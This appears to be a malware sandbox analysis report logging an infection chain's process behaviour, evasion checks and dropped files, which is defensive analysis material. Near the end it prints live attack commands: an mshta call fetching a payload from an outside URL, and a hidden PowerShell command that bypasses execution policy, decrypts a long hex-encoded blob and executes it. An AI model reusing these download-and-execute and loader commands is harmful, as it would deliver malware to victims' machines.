Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1058Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2306Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6040Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3748Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4029
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]Jump to dropped file
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_21-100132
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeAPI coverage: 3.7 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 1058 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 2306 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8072Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3584Thread sleep count: 2732 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 3780 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep count: 4029 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_00007FF74D0AC7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D072F50 FindFirstFileExW,14_2_00007FF74D072F50
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_00007FF74D0BA874
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B6428 FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF74D0B6428
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA4F8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA350
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0ABC70
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0AB7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_00007FF74D0B72A8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B71F4 FindFirstFileW,FindClose,14_2_00007FF74D0B71F4
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A84005
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8494A GetFileAttributesW,FindFirstFileW,FindClose,21_2_00A8494A
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8C2FF
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,21_2_00A8CD9F
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8CD14 FindFirstFileW,FindClose,21_2_00A8CD14
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F5D8
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F735
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8FA36
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A83CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F74005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F74005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_00F7494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_00F7CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7CD14 FindFirstFileW,FindClose,27_2_00F7CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F73CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F73CE2
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D051D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,14_2_00007FF74D051D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000007.00000002.1695777876.000001EE22EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWte%SystemRoot%\system32\mswsock.dll754716D4B6C6E447878');$fgNcqNX.IV=New-Objectbyte[]16;$ckcAaXbLZ=$fgNcqNX.CreateDecryptor();$lGOPfxpiP=[Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk,0,$DLBqcOk.Length));&$lGOPfxpiP.Substring
Source: powershell.exe, 00000007.00000002.1695777876.000001EE22F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\K
Source: powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
Source: powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: mshta.exe, 00000004.00000003.1714744005.000002C2C9777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000004.00000003.1719158237.000002C2C96D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707086050.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720495666.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712666267.000002C2C96CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715474320.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719251921.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C96CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C96D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2644299394.000001F097A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2650975336.000001F09D05B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: powershell.exe, 00000013.00000002.2031671989.0000026D36523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: Guard.exe, 00000015.00000002.2651128046.00000000038B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: SwiftWrite.pif, 0000001B.00000002.2653022988.0000000004039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end nodegraph_21-98343
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C0A00 BlockInput,14_2_00007FF74D0C0A00
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00007FF74D0337B0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D055BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,14_2_00007FF74D055BC0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D036D1C LoadLibraryA,GetProcAddress,14_2_00007FF74D036D1C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09CDC4 GetProcessHeap,HeapAlloc,InitializeAcl,14_2_00007FF74D09CDC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D06AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF74D06AF58
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D078FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF74D078FE4
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0559C8 SetUnhandledExceptionFilter,14_2_00007FF74D0559C8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0557E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF74D0557E4
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00A4A385
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4A354 SetUnhandledExceptionFilter,21_2_00A4A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00F3A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3A354 SetUnhandledExceptionFilter,27_2_00F3A354

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00007FF74D09CE68
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00007FF74D0337B0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D054514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00007FF74D054514
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C4C58 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,14_2_00007FF74D0C4C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemoJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8